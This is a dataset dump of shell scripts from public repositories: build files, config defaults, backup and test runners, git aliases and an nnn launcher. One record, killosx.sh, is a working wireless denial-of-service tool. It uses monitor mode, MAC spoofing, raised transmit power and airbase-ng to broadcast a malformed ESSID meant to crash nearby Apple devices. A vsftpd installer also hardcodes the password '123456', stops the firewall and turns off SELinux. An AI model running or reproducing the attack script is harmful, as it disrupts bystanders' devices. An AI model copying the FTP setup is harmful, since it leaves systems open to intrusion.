blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
642659d84ec7a594f8e3ea8855d12c9ee18120b9 | Shell | delkyd/alfheim_linux-PKGBUILDS | /neptune-cli/PKGBUILD | UTF-8 | 1,299 | 2.5625 | 3 | [
"Apache-2.0"
] | permissive | # Maintainer: grzegorz225 <gorbak25@gmail.com>
pkgname=neptune-cli
_module='neptune-cli'
pkgver=2.0.24
pkgrel=1
pkgdesc="Neptune client library"
arch=('any')
url="https://neptune.ml/"
license=('Apache')
depends=('python' 'python-virtualenv' 'python-pip' 'python-pillow')
source=("LICENSE")
sha256sums=("cfc7749b96f63bd31c3c42b5c471bf756814053e847c10f3eb003417bc523d30")
build() {
cd "${srcdir}"
virtualenv3 ./neptune-cli
./neptune-cli/bin/pip install --no-compile -U neptune-cli
yes | ./neptune-cli/bin/pip uninstall pillow
virtualenv3 --relocatable ./neptune-cli
sed -i "s?${srcdir}?/opt?" ./neptune-cli/bin/activate
sed -i -e "s@fin.read()@ b\"import sys\\\\nsys.path.append(\\\\\"/usr/lib/python3.6/site-packages\\\\\")\\\\n\"+&@" ./neptune-cli/lib/python3.6/site-packages/past/builtins/misc.py
}
package() {
cd "${pkgdir}"
mkdir "./opt/"
cp -r "${srcdir}/neptune-cli" "./opt/"
mkdir "./usr"
mkdir "./usr/bin"
cp -r "/usr/lib/python3.6/site-packages/PIL" "./opt/neptune-cli/lib/python3.6/site-packages/PIL"
echo "#!/usr/bin/env bash
source /opt/neptune-cli/bin/activate
function finish {
deactivate
}
trap finish EXIT
/opt/neptune-cli/bin/neptune \$*" > ./usr/bin/neptune
chmod +x ./usr/bin/neptune
}
| true |
1a8c4180b40c87bff178505d4f46839f3c752d05 | Shell | cpbennett/openbsd-wip | /graphics/dcmtk/files/regress.sh | UTF-8 | 351 | 3.328125 | 3 | [] | no_license | #!/bin/sh
MODS_HAVE_TESTS="dcmwlm ofstd"
set -e
# Run every executable file in the current directory as a test case;
# entries that file(1) does not classify as executable are skipped.
test_ofstd() {
	ls | while read tc; do
		if ! file "$tc" | fgrep executable >/dev/null; then
			continue
		fi
		echo "=====> Running test $tc"
		./"$tc"
	done
}
# Placeholder for the dcmwlm test runner.  The original body contained
# only a comment, which is a bash syntax error (a "{ ... }" group needs
# at least one command); the ':' no-op keeps the function well-formed
# until the pipeline sketched below is finished.
test_dcmwlm() {
	# ls ../wlistqry/*.dump |
	:
}
# Run each module's tests.  MODS_HAVE_TESTS is deliberately unquoted so
# it word-splits into one iteration per module name.
for m in ${MODS_HAVE_TESTS}; do
echo "====> Running tests for module $m"
# Subshell keeps the cd local to this iteration; eval expands the
# dynamic function name test_$m defined above.
(eval "cd $m/tests && test_$m")
done
| true |
f4365c1a2d2c33328901f4e1471d3589e95b3e9d | Shell | michaelepley/openshift-demo-simple | /config/config-demo-default.sh | UTF-8 | 1,776 | 3.34375 | 3 | [] | no_license | #!/bin/bash
# Re-entry guard: if the defaults were already loaded, announce it and
# stop (return works when the file is sourced, exit when executed; the
# completion flag is set at the end of this file).
[[ -v CONFIGURATION_DEFAULT_COMPLETED ]] && echo "Using default configuration" && { return || exit ; }
# set to "false" to disable the echoing of configuration information
CONFIGURATION_DISPLAY=false
# Base domain; the host names below are all derived from it.
OPENSHIFT_DOMAIN_DEFAULT=rhsademo.net
OPENSHIFT_MASTER_PRIMARY_DEFAULT=master.${OPENSHIFT_DOMAIN_DEFAULT}
OPENSHIFT_APPS_PRIMARY_DEFAULT=apps.${OPENSHIFT_DOMAIN_DEFAULT}
OPENSHIFT_PROXY_AUTH_PRIMARY_DEFAULT=proxy.${OPENSHIFT_DOMAIN_DEFAULT}
# Per-user defaults: project and application names derive from the
# invoking user's name.
OPENSHIFT_USER_PRIMARY_DEFAULT=${USER}
OPENSHIFT_USER_PRIMARY_PASSWORD_DEFAULT='password1!'
OPENSHIFT_PROJECT_PRIMARY_DEFAULT=${OPENSHIFT_USER_PRIMARY_DEFAULT}-default
OPENSHIFT_APPLICATION_NAME_DEFAULT=${OPENSHIFT_USER_PRIMARY_DEFAULT}-app
OPENSHIFT_OUTPUT_FORMAT_DEFAULT=json
if [ "$CONFIGURATION_DISPLAY" != "false" ]; then
echo "Default Configuration_______________________________________"
echo " OPENSHIFT_DOMAIN_DEFAULT = ${OPENSHIFT_DOMAIN_DEFAULT}"
echo " OPENSHIFT_MASTER_PRIMARY_DEFAULT = ${OPENSHIFT_MASTER_PRIMARY_DEFAULT}"
echo " OPENSHIFT_APPS_PRIMARY_DEFAULT = ${OPENSHIFT_APPS_PRIMARY_DEFAULT}"
echo " OPENSHIFT_PROXY_AUTH_PRIMARY_DEFAULT = ${OPENSHIFT_PROXY_AUTH_PRIMARY_DEFAULT}"
echo " OPENSHIFT_USER_PRIMARY_DEFAULT = ${OPENSHIFT_USER_PRIMARY_DEFAULT}"
# md5sum here only obfuscates the password for display; it is not a
# security measure.
echo " OPENSHIFT_USER_PRIMARY_PASSWORD_DEFAULT = `echo ${OPENSHIFT_USER_PRIMARY_PASSWORD_DEFAULT} | md5sum` (obfuscated)"
echo " OPENSHIFT_PROJECT_PRIMARY_DEFAULT = ${OPENSHIFT_PROJECT_PRIMARY_DEFAULT}"
echo " OPENSHIFT_APPLICATION_NAME_DEFAULT = ${OPENSHIFT_APPLICATION_NAME_DEFAULT}"
echo " OPENSHIFT_OUTPUT_FORMAT_DEFAULT = ${OPENSHIFT_OUTPUT_FORMAT_DEFAULT}"
echo "____________________________________________________________"
fi
CONFIGURATION_DEFAULT_COMPLETED=true | true |
0921753eb63fa2263f3d4f8c6e2f7b8c3d6b88db | Shell | li-weibiao/shell-- | /auto_config_vsftpd_virtual_v3.sh | UTF-8 | 1,434 | 3.078125 | 3 | [] | no_license | #!/bin/bash
#2020年8月21日 14:46:10
#auto config ${FTP_DAEMON} user
#by author li
##################
FTP_YUM="yum -y install"
# FTP_DAEMON must be assigned before the variables that reference it:
# parameter expansion happens at assignment time, so the original
# ordering left FTP_DIR as "/etc//" and FTP_DB as "_login".
FTP_DAEMON="vsftpd"
FTP_DIR="/etc/${FTP_DAEMON}/"
FTP_DB="${FTP_DAEMON}_login"
FTP_VIR="jfedu001"
FTP_USR="ftpuser"
FTP_USR_CNF="${FTP_DAEMON}_user_conf"
# Install the FTP daemon and its dependencies, then do a first start.
$FTP_YUM ${FTP_DAEMON}*
rpm -qa | grep ${FTP_DAEMON}
systemctl restart ${FTP_DAEMON}.service
$FTP_YUM pam* libdb-utils libdb* --skip-broken
# Build the virtual-user credential list (username on one line, the
# password on the next) and compile it into a Berkeley DB for pam_userdb.
touch $FTP_DIR/${FTP_USR}s.txt
echo "$FTP_VIR
123456" > $FTP_DIR/${FTP_USR}s.txt
db_load -T -t hash -f $FTP_DIR/${FTP_USR}s.txt $FTP_DIR/${FTP_DB}.db
chmod 700 $FTP_DIR/${FTP_DB}.db
# Point PAM authentication for the daemon at the database built above.
echo "auth required pam_userdb.so db=$FTP_DIR/${FTP_DB}
account required pam_userdb.so db=$FTP_DIR/${FTP_DB}">/etc/pam.d/${FTP_DAEMON}
# System account that all virtual users are mapped onto (no shell login).
useradd -s /sbin/nologin ${FTP_USR}
# Enable virtual-user mode in the daemon configuration.
echo "
#config virtual user FTP
pam_service_name=${FTP_DAEMON}
guest_enable=YES
guest_username=${FTP_USR}
user_config_dir=$FTP_DIR/${FTP_USR_CNF}
virtual_use_local_privs=YES
">>$FTP_DIR/${FTP_DAEMON}.conf
# Per-user configuration file for the virtual user.
# NOTE(review): local_root below says "jfde001" while the directory
# created further down is "$FTP_VIR" (jfedu001) -- looks like a typo;
# confirm which path is intended before changing either.
mkdir -p $FTP_DIR/${FTP_USR_CNF}/
touch $FTP_DIR/${FTP_USR_CNF}/$FTP_VIR
echo "
local_root=/home/${FTP_USR}/jfde001
write_enable=YES
anon_world_readable_only=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
anon_other_write_enable=YES
">$FTP_DIR/${FTP_USR_CNF}/$FTP_VIR
mkdir -p /home/${FTP_USR}/$FTP_VIR
chown -R ${FTP_USR}:${FTP_USR} /home/${FTP_USR}
# Restart with the new config; firewall and SELinux enforcement are
# switched off so the demo setup is reachable.
systemctl restart ${FTP_DAEMON}.service
systemctl stop firewalld.service
setenforce 0
| true |
b821fac75f8b35735918183755e59ca6c22856f0 | Shell | DalavanCloud/libreoffice-linguistic-tools | /LinguisticTools/build/edit_code.sh | UTF-8 | 709 | 2.703125 | 3 | [] | no_license | #!/bin/sh
# Created 28-Jan-2013 by Jim K
#
# Open all code in pythonpath for editing using Vim, with each package in
# a separate window.
#
BASEPATH="/media/OurDocs/computing/Office/OOLT/LinguisticTools/pythonpath"

# Open each package in its own gvim window.  The original script
# repeated the gvim/sleep pair eight times; a loop over the package
# sub-directories does the same job.  The sleep waits for a window to
# appear before launching the next one, so the windows show up in the
# intended order in the task bar.
for subdir in UI App Access/Writer Access/Calc Access/PlainText Access/Xml Access Utils; do
	gvim "$BASEPATH/lingt/$subdir/"*.py &
	sleep 2
done
| true |
fe0a9e1b9b2569a27cb10d2f05b8e2b09c18252e | Shell | huanglongyu/bin | /unpackfsimg | UTF-8 | 1,656 | 3.859375 | 4 | [] | no_license | #!/bin/bash
echo "InputFile : ${1}"
####################################
# #
#TODO:to judge the img not depends #
# on filename #
# #
####################################
# below expressions annotated needs help #
#if [ "${1}" != 'img\$' ] ;then
#if [[ "${1}" =~ \.img$ ]] ;then
if [ "`echo ${1} | grep -o "\.img$"`" != ".img" ] ;then
echo -e "\n"
echo "the file is not a img, exit"
echo "---------erro---------"
#rm ${1}.back 2>/dev/null
exit 1;
fi
# Derive names from the image argument: unpackDir is the basename with
# its extension stripped; rawImg is the converted image written into the
# current working directory.
unpackDir=`echo ${1##*/} | awk -F. '{print $1}'`
outputDir=
currentPath=`pwd`
rawImg=${currentPath}/`echo ${1##*/}`.raw
##### first backup the img #####
cp -f ${1} ${currentPath}/`echo ${1##*/}`.back 2>/dev/null
# If the target directory already exists, unmount/clean artifacts from a
# previous run and extract into "<name>.back" instead.
if [ -d ${unpackDir} ];then
echo "already exit the ${unpackDir} dir,make ${unpackDir}.back instead "
sudo umount ${unpackDir}.back 2>/dev/null
sudo rm -rf ${unpackDir}.back 2>/dev/null
sudo umount ${unpackDir} 2>/dev/null
sudo rm ${rawImg} 2>/dev/null
sudo mkdir ${unpackDir}.back
outputDir=${unpackDir}.back
else
echo "make dir : ${unpackDir}"
mkdir ${unpackDir}
outputDir=${unpackDir}
fi
# Convert the sparse image to a raw ext4 image with simg2img, then mount
# it and hand ownership of the mount point to the invoking user.
# NOTE(review): running the command from a string ($cmd) word-splits, so
# this assumes paths without spaces -- confirm before relying on it.
cmd="simg2img ${1} ${rawImg}"
if ${cmd} ;then
sudo mount -t ext4 ${rawImg} ${outputDir}
sudo chown -R ${USER}:${USER} ${outputDir}
else
echo -e "\n"
echo "exe simg2img failed,exit"
echo "---------erro---------"
exit 1;
fi
#simg2img ${1} ${rawImg}
#result=`echo $?`
#if [ ${result} -eq 0 ];then
# sudo mount -t ext4 ${rawImg} ${outputDir}
#fi
echo -e "\n"
echo "OutputDir : ${outputDir}"
echo "---------success---------"
| true |
08bb98a30466d3b9a4e8915c74e3922c2c45e732 | Shell | jameswinegar/self-support-scripts | /publisher.sh | UTF-8 | 708 | 3.9375 | 4 | [] | no_license | #!/usr/bin/env bash
# move desktop, scripts, and service files to appropriate locations
# (each rsync's include/exclude set copies only files of one type from
# the folder, recursing through sub-directories via --include='*/')
for FOLDER in Hashicorp
do
rsync -avzh --include='*/' --include="*.desktop" --exclude="*" $FOLDER/ /usr/share/applications/
rsync -avzh --include='*/' --include="*.sh" --exclude="*" $FOLDER/ /usr/local/bin/
rsync -avzh --include='*/' --include="*.service" --exclude="*" $FOLDER/ /etc/systemd/system/
done
# create an array of all services
# NOTE(review): /tmp/tmpfile is a fixed, predictable path; mktemp (or
# "readarray -t array < <(find ...)") would avoid the temp file --
# confirm before changing.
declare -a array
find . -name "*.service" -exec basename {} \; > /tmp/tmpfile
readarray -t array < /tmp/tmpfile
rm -f /tmp/tmpfile
# for each service, enable and start the service
for SERVICE in "${array[@]}"
do
systemctl enable $SERVICE
systemctl start $SERVICE
done
| true |
603bc78b8236dcb23498f735c0ee49624935548d | Shell | kzgs/soap4r-1.9 | /test/soap/ssl/install_certs.sh | UTF-8 | 1,060 | 2.796875 | 3 | [] | no_license | #!/usr/bin/env bash
# Early exit left in on purpose: the certificate setup below is known to
# be broken, so everything after the `exit` is dead code kept only for
# reference.
echo "this script does not work;"
echo "the ssl test does not work either"
exit
rm myCA -fr
conf=../openssl.my.cnf
mkdir -m 0755 ./myCA ./myCA/private ./myCA/certs ./myCA/newcerts ./myCA/crl
pushd ./myCA > /dev/null
touch ./index.txt
echo '01' > ./serial
#create the server private key
openssl req -config $conf -new -x509 -keyout ./private/server.key -out ./certs/server.crt -days 1825
#create the CA certificate and key
openssl req -config $conf -new -x509 -keyout ./private/ca.key -out ./certs/ca.crt -days 1825
#create the certificate request
openssl req -config $conf -new -nodes -keyout ./private/server.key -out ./server.csr -days 365
#sign the certificate request
openssl ca -config $conf -policy policy_anything -out certs/ca.cert -infiles ./server.csr
rm -f ./server.csr
#verify the cert
openssl x509 -subject -issuer -enddate -noout -in ./certs/ca.crt
popd > /dev/null
#chmod 0400 ./myCA/private/server.key
# chown root.apache /etc/pki_jungle/myCA/private/server.key
# chmod 0440 /etc/pki_jungle/myCA/private/server.key | true |
3bdf519001b5464bec9ac8028a4bdfec0689f518 | Shell | Landers1037/jjservice-go | /shell/backup/backup_jjmail.sh | UTF-8 | 151 | 2.640625 | 3 | [] | no_license | #!/usr/bin/env bash
# Root directory that holds the deployed applications.
apps_root="/home/apps"

# Archive the jjmail application tree into jjmail.zip in the current
# directory (quiet, overwriting any existing archive); abort the whole
# script with status 1 if zip fails.
backup_jjmail()
{
    zip -q -o -r jjmail.zip "${apps_root}/jjmail" || exit 1
}

backup_jjmail
exit 0
44d29ac5e4852cba321d055629dc9fe1dc8ccee6 | Shell | bfildier/Fildier2020 | /SAM_scripts/process_outputs/compareStep.sh | UTF-8 | 622 | 3.375 | 3 | [] | no_license | #!/bin/bash
# Reference time step
ref_step=576000

# Classify each file name of the form <prefix>_<zero-padded-step>.nc as
# before/after the reference step.  For every argument it prints the raw
# step, the numeric step, and the verdict (same output as the original
# inline loop for well-formed names).
classify_steps() {
	local file suffix step num
	for file in "$@"; do
		# Extract suffix containing time step from file
		suffix=${file##*_}
		# Extract time step from suffix
		step=${suffix%*.nc}
		echo $step
		# Force base-10 interpretation: trims leading zeros and, unlike
		# the old `sed 's/^0*//'`, maps an all-zero step to 0 instead of
		# an empty string (which broke the -lt comparison below).
		num=$((10#$step))
		echo $num
		# Compare with reference time step
		if [[ $num -lt ${ref_step} ]]; then
			echo "${file##*/} before ${ref_step}"
		else
			echo "${file##*/} after ${ref_step}"
		fi
	done
}

# Word-splitting of $* is intentional: arguments are plain file names.
classify_steps $*
| true |
7d959aeeb73a28dc602c7b7e8d3d93597394517e | Shell | pete0emerson/tendril | /scripts/build.sh | UTF-8 | 639 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -ex

# Collect build metadata that is injected into the binaries via -ldflags.
buildTime=$(date +%s)
buildDate=$(date -d @${buildTime} -u "+%Y-%m-%d %H:%M:%S UTC")
buildHash=$(git rev-parse HEAD)
# Flag dirty working trees so the embedded commit hash is not misleading.
if [ ! -z "$(git status --porcelain)" ]; then
	buildHash="$buildHash (with uncommitted changes)"
fi
buildVersion="development"
buildOS=$(uname -s | tr 'A-Z' 'a-z')
buildInstallMethod=make

mkdir -p bin
for app in $(ls cmd) ; do
	# Build inside a subshell so the working directory is restored for
	# the next iteration.  The previous `cd ..` at the end of the loop
	# only climbed one level (back into cmd/), which made every
	# iteration after the first fail under `set -e`.
	(
	cd cmd/$app
	go build\
		-ldflags "-X 'main.buildDate=${buildDate}'
		-X 'main.buildHash=${buildHash}'
		-X 'main.buildVersion=${buildVersion}'
		-X 'main.buildOS=${buildOS}'
		-X 'main.buildInstallMethod=${buildInstallMethod}'" \
		-o ../../bin/$app
	)
done
| true |
06cae4f3da55dd3fc7ad290b2d110e13ee3d7a73 | Shell | toddyamakawa/bin | /,nnn | UTF-8 | 1,963 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env bash
set -e
declare -r CURRENT_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]}")")"
# More info here:
# https://github.com/jarun/nnn/blob/master/misc/quitcd/quitcd.bash_zsh
#
# The default behaviour is to cd on quit (nnn checks if NNN_TMPFILE is set)
# To cd on quit only on ^G, remove the "export" as in:
# NNN_TMPFILE="${XDG_CONFIG_HOME:-$HOME/.config}/nnn/.lastd"
# NOTE: NNN_TMPFILE is fixed, should not be modified
export NNN_TMPFILE="${XDG_CONFIG_HOME:-$HOME/.config}/nnn/.lastd"
# 0 = black
# 1 = red
# 2 = green
# 3 = yellow
# 4 = blue
# 5 = magenta
# 6 = cyan
# 7 = white
export NNN_COLORS='4231'
# Use _ for arbitrary non-background CLI commands
# Use * to skip user confirmation
# Use _| to run a GUI app
# Use -_ to disable directory refresh
NNN_PLUG='g:_git status'
NNN_PLUG+=';b:_nnn-bookmarks*'
NNN_PLUG+=';e:_,env'
#NNN_PLUG+=';h:_cdhome*'
#NNN_PLUG+=';H:_cdhome'
NNN_PLUG+=';P:preview-tui'
#NNN_PLUG+=';a:bookmarks'
NNN_PLUG+=';o:fzopen'
NNN_PLUG+=';p:_nnn-cd-clipboard*'
NNN_PLUG+=';s:_nnn-show-selection'
NNN_PLUG+=';y:-_,clip $nnn*'
NNN_PLUG+=';z:_nnn-zsh*'
export NNN_PLUG
# TODO: Figure out how to get this to work
#open_with="${XDG_CONFIG_HOME:-$HOME/.config}/nnn/plugins/nuke"
#[[ -f "$open_with" ]] && export NNN_OPENER="$open_with"
# Use `less` as opener
export PAGER='less'
export LESS='-Ri'
export NNN_OPENER=less
# Fix ordering
export LC_ALL=C
# Check key collisions
nnn -K
# Open FIFO
export NNN_FIFO="$(mktemp --suffix=-nnn -u)"
(umask 077; mkfifo "$NNN_FIFO")
# Open preview pane
if [[ -e ${TMUX%%,*} ]]; then
width=$(($(tput cols)-50))
tmux split-window -dh -l $width nnn-preview $NNN_FIFO
#tmux split-window \
#-dh \
#-e "NNN_FIFO=$NNN_FIFO" \
#-l $width zsh
fi
# Run nnn
# -c: cli-opener
# -d: detail mode
nnn -c $@
# Clean up FIFO
rm "$NNN_FIFO"
# Print the contents of $NNN_TMPFILE
#if [[ -f "$NNN_TMPFILE" ]]; then
#echo "NNN_TMPFILE: $(cat $NNN_TMPFILE)"
#rm -f $NNN_TMPFILE
#fi
| true |
b1381c6c151550091f900cbee775a21241c8b807 | Shell | Callisto13/dotfiles | /config/bash/git.bash | UTF-8 | 935 | 3.140625 | 3 | [] | no_license | ## Everything related to git goes here.
# Environment Variables
export GIT_DUET_GLOBAL=true
export GIT_DUET_CO_AUTHORED_BY=1
export GIT_DUET_ROTATE_AUTHOR=1
# Git aliases
alias git="LANG=en_GB git"
alias duet='git duet --global'
alias gap="git add -p"
alias gp="git push"
alias gst='git status'
alias gsu="git submodule update --init --recursive"
alias gpr="git pull --rebase"
alias solo='git solo --global'
alias gti='git'
alias ga='git add .'
## Custom Functions
# Add committer initials to the git prompt info
# TODO can this be simplified by using a plugin instead?
# Relies on git_prompt_vars (from the surrounding prompt framework) to
# populate SCM_PREFIX/SCM_BRANCH/SCM_STATE/SCM_SUFFIX before they are
# echoed below.
function git_prompt_info {
	git_prompt_vars
	# Derive lowercase initials from each configured git-duet author
	# name and join them with '+' (e.g. "ab+cd").
	GIT_DUET_INITIALS=$(echo $(git config --get-regexp ^duet.env.git-.*-name | sed -e 's/^.*-name //' | tr 'A-Z' 'a-z' | sed -e 's/\([a-z]\)[^ +]*./\1/g' ) | sed -e 's/ /+/')
	# Fall back to the manually configured user.initials when git-duet
	# is not in use.
	GIT_PAIR=${GIT_DUET_INITIALS:-`git config user.initials | sed 's% %+%'`}
	echo -e " $GIT_PAIR$SCM_PREFIX$SCM_BRANCH$SCM_STATE$SCM_SUFFIX"
}
| true |
69d049475b3ec1e5cf91d392553ebcee043687b8 | Shell | vinivsb/my-configs | /git-alias.sh | UTF-8 | 485 | 2.75 | 3 | [] | no_license | add_aliases(){
git config --global alias.st "status -s"
git config --global alias.lg "log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit --date=relative"
git config --global alias.aa "add ."
git config --global alias.who "shortlog -sn"
git config --global alias.undo "reset --hard HEAD"
git config --global alias.ld "log --stat --graph"
git config --global alias.compare "git diff --stat --color"
}
add_aliases
| true |
cb482955d0dad86e8c4b3b94688e1e1f0c94420f | Shell | 533k3r5y7yf/killosx | /killosx.sh | UTF-8 | 2,130 | 3.328125 | 3 | [] | no_license | #!/bin/bash
## killOSX Copyright 2013, d4rkcat (thed4rkcat@yandex.com)
#
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
#
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License at (http://www.gnu.org/licenses/) for
## more details.
# SIGINT cleanup handler (installed via `trap fexit 2` below): stops the
# monitor-mode interface before exiting.
fexit()
{
echo
# `grep fff` matches nothing, so airmon-ng's chatter is discarded
airmon-ng stop $MON1 | grep fff
echo $RED" [*] $MON1 has been shut down,$GRN Goodbye...$RST"
exit
}
iw reg set BO
RED=$(echo -e "\e[1;31m")
BLU=$(echo -e "\e[1;36m")
GRN=$(echo -e "\e[1;32m")
RST=$(echo -e "\e[0;0;0m")
trap fexit 2
case $1 in
"-i")NIC=$2;;
"-h")echo $GRN"""killOSX$RST
Usage - killosx -i wlan0 ~ Run exploit on wlan0
killosx -h ~ This help";exit
esac
# If no interface was supplied via -i, ask for one interactively.
# The original test `[ $NIC -z ]` was malformed and only "worked"
# because its error output was silenced (unset NIC collapsed it to the
# always-true `[ -z ]`); use a proper -z test instead.
if [ -z "${NIC:-}" ]
then
echo $RED""" [>] Which interface do you want to use?:
"
WLANS="$(ifconfig | grep wlan | cut -d ' ' -f 1)"
for WLAN in $WLANS
do
echo " [>] $WLAN"
done
echo $BLU
read -p " > wlan" NIC
# Accept either a full interface name ("wlan0") or just the suffix
# ("0"), which gets the "wlan" prefix prepended.
if [ "${NIC:0:4}" = 'wlan' ]
then
A=1
else
NIC="wlan"$NIC
fi
fi
# Both branches previously ended with this identical line; hoisted out.
echo $GRN;MON1=$(airmon-ng start $NIC | grep monitor | cut -d ' ' -f 5 | head -c -2);echo " [*] Started $NIC monitor on $MON1"
echo
echo $GRN" [*] Changing MAC and attempting to boost power on $NIC"
ifconfig $NIC down
iwconfig $NIC txpower 30 2> /dev/null
sleep 0.5
ifconfig $NIC up
echo
ifconfig $MON1 down
macchanger -a $MON1
ifconfig $MON1 up
echo $RED"""
[*] Setting ESSID to 'سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ'
[*] All vulnerable Osx in the area is toast.
[>] Press Ctrl+C to exit
"$BLU
airbase-ng -e 'سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ' -I 50 -i $MON1 $MON1
| true |
59bf110be674acee7e434932c776d68268398b81 | Shell | unamatasanatarai/dotfiles | /stow/bin/psls | UTF-8 | 1,476 | 3.875 | 4 | [] | no_license | #!/usr/bin/env bash
set -euo pipefail
. "$(dirname "$0")"/.lib
VERSION="1.0"
# ------------------------------------------------------------
# PRIVATE
# ------------------------------------------------------------
# Take an fzf selection line, pull the PID out of its first
# whitespace-separated column, and send it the default TERM signal.
function dokill {
	local pid
	pid=$(awk '{print $1}' <<< "$*")
	kill "$pid"
	ealert "killed"
}
function dokill9 {
local ps
ps=$(echo "$*" | awk '{print $1}')
kill -9 "$ps"
ealert "Kill-9ed"
}
export -f dokill
export -f dokill9
# ------------------------------------------------------------
# PUBLIC interfaces
# ------------------------------------------------------------
function list_all {
local list
list=$(ps -e)
echo "${list[@]}" | \
fzf \
--header "CTRL+x: kill; CTRL+X: kill -9" \
--scroll-off 2 \
--prompt "ps -e >> " \
--bind "ctrl-x:select+preview(dokill {})" \
--bind "ctrl-X:select+preview(dokill9 {})" \
--preview-window "right,30%"
}
function help {
echo "$(basename "$0") <options>
version $VERSION
Options:
--help This help message
--version Display the version number (it is $VERSION)
"
}
# ------------------------------------------------------------
# ROUTER
# ------------------------------------------------------------
while [[ -n ${1:--help} ]]; do
case ${1:--help} in
--version )
echo "version: $VERSION"
exit 0
;;
--help )
help
exit 0
;;
*)
list_all "$@"
shift
exit 0
;;
esac
shift
done
| true |
9ab7f9d4c9e4608c51b241c89e4a913f02154f72 | Shell | MarioMohr/dotfiles_of_mariomohr | /.bash_aliases | UTF-8 | 1,216 | 3.671875 | 4 | [] | no_license | # enable color support if possible
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias grep='grep --color=auto'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias ip='ip -color=auto'
# ls does list directories first and file sizes are human-readable
alias ls='ls --color=auto --group-directories-first --human-readable'
fi
# long listing of directory content, including dotfiles
alias ll='ls -laA'
# long listing of directory content, including dotfiles and sort them by date (new entries are at the bottom)
alias lt='ls -ltra'
# List only the directories from a `ls -laA` listing (arguments are
# forwarded to ls, e.g. a target directory), arranged in columns.
function lsd(){
	ls -laA "$@" | awk '/^d/ {print $9}' | column
}
# use ls after cd
function CD_LS(){
cd "$@" && ls .
}
alias cd='CD_LS'
# don't remove, instead move to trash (.local/share/Trash/files/)
# Remove trash via "gio trash --empty"
# A desktop session (XDG_CURRENT_DESKTOP set) is required because the
# trash is managed through gio; outside a desktop the function only
# prints advice and deletes nothing.
function MOVE2TRASH(){
    if [ -n "$XDG_CURRENT_DESKTOP" ]; then
        # `hash gio` verifies the command exists; when gio is missing
        # nothing is trashed (hash prints its own error to stderr).
        hash gio && gio trash "$@"
    else
        echo "Removing file(s) is a bad habbit, instead you should move or rename them."
        echo "If you really have to remove some thing(s) you can use the full path i.e. /bin/rm"
    fi
}
# Shadow rm for interactive shells; bypass with the full path /bin/rm.
alias rm='MOVE2TRASH'
| true |
316e139827c5029862deff18513ac089774e040b | Shell | irony0egoist/scf-proxy | /build.sh | UTF-8 | 138 | 2.515625 | 3 | [] | no_license |
#!/bin/bash
# Resolve the repository root (the parent of the directory containing
# this script).  Expansions are quoted so paths with spaces resolve
# correctly; && ensures we never report the wrong directory if cd fails.
work_path=$(cd "$(dirname "$0")/.." && pwd)
echo "$work_path"
# Cross-compile a linux/amd64 binary and zip it -- presumably the
# archive format expected by the serverless deployment; confirm against
# the deploy pipeline.
GOOS=linux GOARCH=amd64 go build -o main cmd/main.go
zip main.zip main
81904245ac6fd067efba41245bc916ea397deed5 | Shell | xaiki/odeon-downloader | /incaa-dl.sh | UTF-8 | 1,078 | 2.890625 | 3 | [] | no_license | #!/bin/sh
INCAA_KEY=`cat incaa.key`;
INCAA_PERFIL=`cat incaa.perfil`;
set -x
while read d; do
(cd $d &&
i=`cat data.json | grep \"sid\" | head -1 |cut -d\: -f2 | sed s/' '//g` &&
title=`cat data.json | grep \"tit\" | head -1 | cut -d\" -f4` &&
titlep=`echo $title | sed s/' '/'_'/g` &&
curl "https://player.odeon.com.ar/odeon/?i=$i&p=$INCAA_PERFIL&s=INCAA&t=$INCAA_KEY" -H 'Accept-Encoding: gzip, deflate, sdch' -H 'Accept-Language: en-US,en;q=0.8' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: https://www.odeon.com.ar/' -H 'Connection: keep-alive' --compressed > player.page
surl=`cat player.page | grep "file: 'http" | cut -d"'" -f2 | sed s/"'"//` &&
ffmpeg -i "$surl" -acodec copy -vcodec copy -copyts $titlep.ts
)
done
| true |
1d784e35ac34475ae3ece412209b629ab1305985 | Shell | lvps/389ds-examples | /ca/cert.sh | UTF-8 | 808 | 3.03125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
HOSTNAME=${1:-ldaptest.example.local}
ID=${HOSTNAME//\./_}
export SAN=$HOSTNAME
if [[ ! -f noise.bin ]]; then
openssl rand -out noise.bin 4096
fi
if [[ -f ${ID}_cert.pem ]] && [[ -f ${ID}.key ]]; then
echo "Reusing previous certificate"
else
# https://security.stackexchange.com/a/86999
openssl req -x509 -newkey rsa:2048 -sha256 -keyout ${ID}.key -out ${ID}_cert.pem -days 365 -nodes -extensions eku -config openssl.cnf -subj "/CN=${HOSTNAME}"
fi
# https://stackoverflow.com/a/4774063
HERE="$( cd "$(dirname "$0")" ; pwd -P )"
echo --- Add this to the playbook ---
echo "dirsrv_tls_cert_file: \"$HERE/${ID}_cert.pem\""
